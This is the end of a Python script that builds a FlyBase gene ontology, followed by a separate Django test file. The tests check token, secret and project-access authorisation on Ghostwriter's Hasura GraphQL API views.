def get_obo(version: Optional[str] = None, force: bool = False) -> Obo:
"""Get OBO."""
version = _get_version(version)
return Obo(
iter_terms=get_terms,
iter_terms_kwargs=dict(force=force, version=version),
name=NAME,
ontology=PREFIX,
typedefs=[from_species, orthologous],
auto_generated_by=f"bio2obo:{PREFIX}",
data_version=version,
)
GTYPE_TO_SO = {
"SRP_RNA_gene": "0001269",
"protein_coding_gene": "0001217",
"pseudogene": "0000336",
"lncRNA_gene": "0002127",
"snRNA_gene": "0001268",
"antisense_lncRNA_gene": "0002182",
"tRNA_gene": "0001272",
"rRNA_gene": "0001637",
"snoRNA_gene": "0001267",
"RNase_P_RNA_gene": "0001639",
"rRNA_5S_gene": "0002238",
"ncRNA_gene": "0001263",
"RNase_MRP_RNA_gene": "0001640",
"rRNA_18S_gene": "0002236",
"rRNA_5_8S_gene": "0002240",
"miRNA_gene": "0001265",
"rRNA_28S_gene": "0002239",
}
def get_terms(version: Optional[str] = None, force: bool = False) -> Iterable[Term]:
"""Get terms."""
version = _get_version(version)
definitions = _get_definitions(version=version, force=force)
abbr_to_taxonomy = _get_organisms(version=version, force=force)
names_df = _get_names(version=version, force=force)
human_orthologs = _get_human_orthologs(version=version, force=force)
missing_taxonomies = set()
so = {
gtype: Reference.auto("SO", GTYPE_TO_SO[gtype])
for gtype in names_df[names_df.columns[1]].unique()
}
for _, reference in sorted(so.items()):
yield Term(reference=reference)
for organism, gtype, identifier, symbol, name in tqdm(names_df.values):
term = Term.from_triple(
prefix=PREFIX,
identifier=identifier,
name=symbol,
definition=definitions.get(identifier),
)
if gtype and pd.notna(gtype):
term.append_parent(so[gtype])
if pd.notna(name):
term.append_synonym(name)
for hgnc_curie in human_orthologs.get(identifier, []):
if not hgnc_curie or pd.isna(hgnc_curie):
continue
term.append_relationship(orthologous, Reference.from_curie(hgnc_curie, auto=True))
taxonomy_id = abbr_to_taxonomy.get(organism)
if taxonomy_id is not None:
term.append_relationship(from_species, Reference.auto("ncbitaxon", taxonomy_id))
elif organism not in missing_taxonomies:
tqdm.write(f"missing mapping for species abbreviation: {organism}")
missing_taxonomies.add(organism)
yield term
if missing_taxonomies:
tqdm.write(f"there were {len(missing_taxonomies)} missing taxa in flybase genes")
@click.command()
@verbose_option
def _main():
obo = get_obo(force=True)
obo.write_default(force=True, write_obo=True, write_obograph=True)
if __name__ == "__main__":
_main()
|
<reponame>bbhunter/Ghostwriter
# Standard Libraries
import logging
from datetime import date, datetime, timedelta
# Django Imports
from django.conf import settings
from django.test import Client, TestCase
from django.urls import reverse
from django.utils import timezone
from django.utils.encoding import force_str
# Ghostwriter Libraries
from ghostwriter.api import utils
from ghostwriter.api.models import APIKey
from ghostwriter.factories import (
ActivityTypeFactory,
DomainFactory,
DomainStatusFactory,
EvidenceFactory,
HistoryFactory,
ProjectAssignmentFactory,
ProjectFactory,
ReportFactory,
ReportFindingLinkFactory,
ReportTemplateFactory,
ServerHistoryFactory,
ServerRoleFactory,
ServerStatusFactory,
StaticServerFactory,
UserFactory,
)
logging.disable(logging.CRITICAL)
PASSWORD = "<PASSWORD>!"
ACTION_SECRET = settings.HASURA_ACTION_SECRET
# Tests related to authentication in custom CBVs
class HasuraViewTests(TestCase):
"""
Collection of tests for :view:`api:HasuraView` and
:view:`api:HasuraActionView` custom CBVs.
"""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.inactive_user = UserFactory(password=PASSWORD, is_active=False)
cls.uri = reverse("api:graphql_test")
# Create valid and invalid JWTs for testing
yesterday = timezone.now() - timedelta(days=1)
cls.user_token_obj, cls.user_token = APIKey.objects.create_token(
user=cls.user, name="Valid Token"
)
cls.inactive_token_obj, cls.inactive_token = APIKey.objects.create_token(
user=cls.inactive_user, name="Inactive User Token"
)
cls.expired_token_obj, cls.expired_token = APIKey.objects.create_token(
user=cls.inactive_user, name="Expired Token", expiry_date=yesterday
)
cls.revoked_token_obj, cls.revoked_token = APIKey.objects.create_token(
user=cls.inactive_user, name="Revoked Token", revoked=True
)
# Test data set as required inputs for the test view
cls.data = {"input": {"id": 1, "function": "test_func", "args": {"arg1": "test"}}}
def setUp(self):
self.client = Client()
def test_action_with_valid_jwt(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
def test_action_requires_correct_secret(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": "wrong", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 403)
def test_action_requires_secret(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_AUTHORIZATION": f"Bearer {token}", },
)
self.assertEqual(response.status_code, 403)
result = {
"message": "Unauthorized access method",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_action_requires_all_input(self):
_, token = utils.generate_jwt(self.user)
# Test with no data
response = self.client.post(
self.uri,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Missing all required inputs",
"extensions": {"code": "InvalidRequestBody", },
}
self.assertJSONEqual(force_str(response.content), result)
# Test with incomplete data
response = self.client.post(
self.uri,
data={"input": {"id": 1, }},
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Missing one or more required inputs",
"extensions": {"code": "InvalidRequestBody", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_action_with_invalid_json_input(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data="Not JSON",
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
def test_action_requires_jwt(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 400)
result = {
"message": "No ``Authorization`` header found",
"extensions": {"code": "JWTMissing", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_action_with_valid_jwt_and_inactive_user(self):
_, token = utils.generate_jwt(self.user)
self.user.is_active = False
self.user.save()
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
self.user.is_active = True
self.user.save()
def test_action_with_invalid_jwt(self):
token = "<PASSWORD>!"
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
def test_action_with_valid_tracked_token(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {self.user_token}"},
)
self.assertEqual(response.status_code, 200)
def test_action_with_valid_tracked_token_and_inactive_user(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {self.inactive_token}"},
)
self.assertEqual(response.status_code, 401)
def test_action_with_expired_tracked_token(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {self.expired_token}"},
)
self.assertEqual(response.status_code, 401)
def test_action_with_revoked_tracked_token(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {self.revoked_token}"},
)
self.assertEqual(response.status_code, 401)
class HasuraEventViewTests(TestCase):
"""Collection of tests for the :view:`api:HasuraEventView` custom CBV."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_event_test")
cls.data = {
"event": {
"data": {
"new": {},
"old": {},
},
}
}
def setUp(self):
self.client = Client()
def test_event_with_valid_input(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 200)
def test_action_requires_secret(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
)
self.assertEqual(response.status_code, 403)
result = {
"message": "Unauthorized access method",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_requires_correct_secret(self):
response = self.client.post(
self.uri,
data=self.data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": "wrong", },
)
self.assertEqual(response.status_code, 403)
def test_with_invalid_json(self):
response = self.client.post(
self.uri,
data="Not JSON",
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Missing event data",
"extensions": {"code": "InvalidRequestBody", },
}
self.assertJSONEqual(force_str(response.content), result)
# Tests related to theauthetnication webhook
class HasuraWebhookTests(TestCase):
"""Collection of tests for :view:`api:GraphqlAuthenticationWebhook`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_webhook")
cls.public_data = {
"X-Hasura-Role": "public",
"X-Hasura-User-Id": "-1",
"X-Hasura-User-Name": "anonymous",
}
def setUp(self):
self.client = Client()
def test_graphql_webhook_with_valid_jwt(self):
_, token = utils.generate_jwt(self.user)
data = {
"X-Hasura-Role": f"{self.user.role}",
"X-Hasura-User-Id": f"{self.user.id}",
"X-Hasura-User-Name": f"{self.user.username}",
}
response = self.client.get(
self.uri,
content_type="application/json",
**{"HTTP_AUTHORIZATION": f"Bearer {token}", },
)
self.assertEqual(response.status_code, 200)
self.assertJSONEqual(force_str(response.content), data)
def test_graphql_webhook_without_jwt(self):
response = self.client.get(
self.uri,
content_type="application/json",
)
self.assertEqual(response.status_code, 200)
self.assertJSONEqual(force_str(response.content), self.public_data)
# Tests related to Hasura Actions
class HasuraLoginTests(TestCase):
"""Collection of tests for :view:`api:graphql_login`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_login")
def setUp(self):
self.client = Client()
def test_graphql_login(self):
data = {
"input": {"username": f"{self.user.username}", "password": f"{PASSWORD}"}
}
response = self.client.post(
self.uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 200)
# Test bypasses Hasura so the ``["data"]["login"]`` keys are not present
self.assertTrue(response.json()["token"])
def test_graphql_login_with_invalid_credentials(self):
data = {
"input": {"username": f"{self.user.username}", "password": "<PASSWORD>"}
}
result = {
"message": "Invalid credentials",
"extensions": {"code": "InvalidCredentials", },
}
response = self.client.post(
self.uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 401)
self.assertJSONEqual(force_str(response.content), result)
class HasuraWhoamiTests(TestCase):
"""Collection of tests for :view:`api:GraphqlWhoami`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_whoami")
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def test_graphql_whoami(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
# Test bypasses Hasura so the ``["data"]["whoami"]`` keys are not present
self.assertEqual(response.json()["username"], self.user.username)
def test_graphql_whoami_with_tracked_token(self):
user_token_obj, user_token = APIKey.objects.create_token(
user=self.user, name="Valid Token"
)
response = self.client.post(
self.uri,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {user_token}"},
)
self.assertEqual(response.status_code, 200)
# Test bypasses Hasura so the ``["data"]["whoami"]`` keys are not present
self.assertEqual(response.json()["username"], self.user.username)
class HasuraGenerateReportTests(TestCase):
"""Collection of tests for :view:`api:GraphqlGenerateReport`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.assignment = ProjectAssignmentFactory(operator=cls.user)
cls.report = ReportFactory(project=cls.assignment.project)
cls.other_report = ReportFactory()
cls.uri = reverse("api:graphql_generate_report")
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def test_graphql_generate_report(self):
_, token = utils.generate_jwt(self.user)
data = {"input": {"id": self.report.pk}}
response = self.client.post(
self.uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
def test_graphql_generate_report_with_invalid_report(self):
_, token = utils.generate_jwt(self.user)
data = {"input": {"id": 999}}
response = self.client.post(
self.uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
result = {
"message": "Unauthorized access",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_generate_report_without_access(self):
_, token = utils.generate_jwt(self.user)
data = {"input": {"id": self.other_report.pk}}
response = self.client.post(
self.uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
result = {
"message": "Unauthorized access",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
class HasuraCheckoutTests(TestCase):
"""
Collection of tests for the ``HasuraCheckoutView`` class and the related
:view:`api:GraphqlCheckoutDomain` and :view:`api:GraphqlCheckoutServer`.
"""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.activity = ActivityTypeFactory()
cls.project = ProjectFactory()
cls.other_project = ProjectFactory()
cls.assignment = ProjectAssignmentFactory(operator=cls.user, project=cls.project)
cls.domain_unavailable = DomainStatusFactory(domain_status="Unavailable")
cls.domain = DomainFactory()
cls.unavailable_domain = DomainFactory(domain_status=cls.domain_unavailable)
cls.expired_domain = DomainFactory(expiration=timezone.now() - timedelta(days=1))
cls.server_unavailable = ServerStatusFactory(server_status="Unavailable")
cls.server = StaticServerFactory()
cls.unavailable_server = StaticServerFactory(server_status=cls.server_unavailable)
cls.server_role = ServerRoleFactory()
cls.domain_uri = reverse("api:graphql_checkout_domain")
cls.server_uri = reverse("api:graphql_checkout_server")
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def generate_domain_data(
self, project, domain, activity,
start_date=date.today() - timedelta(days=1),
end_date=date.today() + timedelta(days=1),
note=None
):
return {
"input": {
"projectId": project,
"domainId": domain,
"activityTypeId": activity,
"startDate": start_date,
"endDate": end_date,
"note": note,
}
}
def generate_server_data(
self, project, server, activity, server_role,
start_date=date.today() - timedelta(days=1),
end_date=date.today() + timedelta(days=1),
note=None
):
return {
"input": {
"projectId": project,
"serverId": server,
"activityTypeId": activity,
"serverRoleId": server_role,
"startDate": start_date,
"endDate": end_date,
"note": note,
}
}
def test_graphql_checkout_domain(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.project.pk, self.domain.pk, self.activity.pk, note="Test note")
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.assertJSONEqual(force_str(response.content), {"result": "success", })
self.domain.refresh_from_db()
self.assertEqual(self.domain.domain_status, self.domain_unavailable)
def test_graphql_checkout_server(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_server_data(self.project.pk, self.server.pk, self.activity.pk, self.server_role.pk, note="Test note")
response = self.client.post(
self.server_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.assertJSONEqual(force_str(response.content), {"result": "success", })
self.server.refresh_from_db()
self.assertEqual(self.server.server_status, self.server_unavailable)
def test_graphql_checkout_server_with_invalid_role(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_server_data(self.project.pk, self.server.pk, self.activity.pk, 999, note="Test note")
response = self.client.post(
self.server_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Server Role Type does not exist",
"extensions": {"code": "ServerRoleDoesNotExist", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_object_with_invalid_dates(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(
self.project.pk,
self.domain.pk,
self.activity.pk,
start_date=date.today() + timedelta(days=1),
end_date=date.today() - timedelta(days=1),
)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "End date is before start date",
"extensions": {"code": "InvalidDates", },
}
self.assertJSONEqual(force_str(response.content), result)
data = self.generate_domain_data(
self.project.pk,
self.domain.pk,
self.activity.pk,
start_date="2022-0325",
end_date=date.today() - timedelta(days=1),
)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Invalid date values (must be YYYY-MM-DD)",
"extensions": {"code": "InvalidDates", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_invalid_object(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.project.pk, 999, self.activity.pk)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Domain does not exist",
"extensions": {"code": "DomainDoesNotExist", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_invalid_activity(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.project.pk, self.domain.pk, 999)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Activity Type does not exist",
"extensions": {"code": "ActivityTypeDoesNotExist", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_invalid_project(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(999, self.domain.pk, self.activity.pk)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
result = {
"message": "Unauthorized access",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_unavailable_domain(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.project.pk, self.unavailable_domain.pk, self.activity.pk)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Domain is unavailable",
"extensions": {"code": "DomainUnavailable", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_unavailable_server(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_server_data(self.project.pk, self.unavailable_server.pk, self.activity.pk, self.server_role.pk)
response = self.client.post(
self.server_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Server is unavailable",
"extensions": {"code": "ServerUnavailable", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_expired_domain(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.project.pk, self.expired_domain.pk, self.activity.pk)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Domain is expired",
"extensions": {"code": "DomainExpired", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_graphql_checkout_without_project_access(self):
_, token = utils.generate_jwt(self.user)
data = self.generate_domain_data(self.other_project.pk, self.domain.pk, self.activity.pk)
response = self.client.post(
self.domain_uri,
data=data,
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
result = {
"message": "Unauthorized access",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
class CheckoutDeleteViewTests(TestCase):
"""
Collection of tests for ``CheckoutDeleteView`` class and related
:view:`api.GraphqlDomainReleaseAction` and :view:`api.GraphqlServerReleaseAction`.
"""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.domain_uri = reverse("api:graphql_domain_checkout_delete")
cls.server_uri = reverse("api:graphql_server_checkout_delete")
cls.project = ProjectFactory()
cls.other_project = ProjectFactory()
ProjectAssignmentFactory(operator=cls.user, project=cls.project)
cls.domain_available = DomainStatusFactory(domain_status="Available")
cls.domain_unavailable = DomainStatusFactory(domain_status="Unavailable")
cls.domain = DomainFactory(domain_status=cls.domain_unavailable)
cls.domain_checkout = HistoryFactory(domain=cls.domain, project=cls.project)
cls.other_domain = DomainFactory(domain_status=cls.domain_unavailable)
cls.other_checkout = HistoryFactory(domain=cls.other_domain, project=cls.other_project)
cls.server_available = ServerStatusFactory(server_status="Available")
cls.server_unavailable = ServerStatusFactory(server_status="Unavailable")
cls.server = StaticServerFactory(server_status=cls.server_unavailable)
cls.server_checkout = ServerHistoryFactory(server=cls.server, project=cls.project)
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def generate_data(self, checkout_id):
return {"input": {"checkoutId": checkout_id, }}
def test_deleting_domain_checkout(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.domain_uri,
data=self.generate_data(self.domain_checkout.pk),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.domain.refresh_from_db()
self.assertEqual(self.domain.domain_status, self.domain_available)
def test_deleting_server_checkout(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.server_uri,
data=self.generate_data(self.server_checkout.pk),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.server.refresh_from_db()
self.assertEqual(self.server.server_status, self.server_available)
def test_deleting_domain_checkout_without_access(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.domain_uri,
data=self.generate_data(self.other_checkout.pk),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
result = {
"message": "Unauthorized access",
"extensions": {"code": "Unauthorized", },
}
self.assertJSONEqual(force_str(response.content), result)
def test_deleting_invalid_checkout(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.domain_uri,
data=self.generate_data(checkout_id=999),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
result = {
"message": "Checkout does not exist",
"extensions": {"code": "HistoryDoesNotExist", },
}
self.assertJSONEqual(force_str(response.content), result)
class GraphqlDeleteEvidenceActionTests(TestCase):
"""Collection of tests for :view:`GraphqlDeleteEvidenceAction`."""
@classmethod
def setUpTestData(cls):
cls.Evidence = EvidenceFactory._meta.model
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_delete_evidence")
cls.project = ProjectFactory()
cls.other_project = ProjectFactory()
ProjectAssignmentFactory(operator=cls.user, project=cls.project)
cls.report = ReportFactory(project=cls.project)
cls.other_report = ReportFactory(project=cls.other_project)
cls.finding = ReportFindingLinkFactory(report=cls.report)
cls.other_finding = ReportFindingLinkFactory(report=cls.other_report)
cls.evidence = EvidenceFactory(finding=cls.finding)
cls.other_evidence = EvidenceFactory(finding=cls.other_finding)
def setUp(self):
self.client = Client()
def generate_data(self, evidence_id):
return {"input": {"evidenceId": evidence_id, }}
def test_deleting_evidence(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(self.evidence.id),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.assertFalse(self.Evidence.objects.filter(id=self.evidence.id).exists())
def test_deleting_evidence_with_invalid_id(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(999),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
def test_deleting_evidence_without_access(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(self.other_evidence.id),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
class GraphqlDeleteReportTemplateAction(TestCase):
"""Collection of tests for :view:`GraphqlDeleteReportTemplateAction`."""
@classmethod
def setUpTestData(cls):
cls.ReportTemplate = ReportTemplateFactory._meta.model
cls.user = UserFactory(password=PASSWORD)
cls.mgr_user = UserFactory(password=PASSWORD, role="manager")
cls.uri = reverse("api:graphql_delete_template")
cls.template = ReportTemplateFactory()
cls.protected_template = ReportTemplateFactory(protected=True)
def setUp(self):
self.client = Client()
def generate_data(self, template_id):
return {"input": {"templateId": template_id, }}
def test_deleting_template(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(self.template.id),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
self.assertFalse(self.ReportTemplate.objects.filter(id=self.template.id).exists())
def test_deleting_template_with_invalid_id(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(999),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 400)
def test_deleting_protected_template_with_access(self):
_, token = utils.generate_jwt(self.mgr_user)
response = self.client.post(
self.uri,
data=self.generate_data(self.protected_template.id),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 200)
def test_deleting_protected_template_without_access(self):
_, token = utils.generate_jwt(self.user)
response = self.client.post(
self.uri,
data=self.generate_data(self.protected_template.id),
content_type="application/json",
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
)
self.assertEqual(response.status_code, 401)
# Tests related to Hasura Event Triggers
class GraphqlDomainUpdateEventTests(TestCase):
"""Collection of tests for :view:`api:GraphqlDomainUpdateEvent`."""
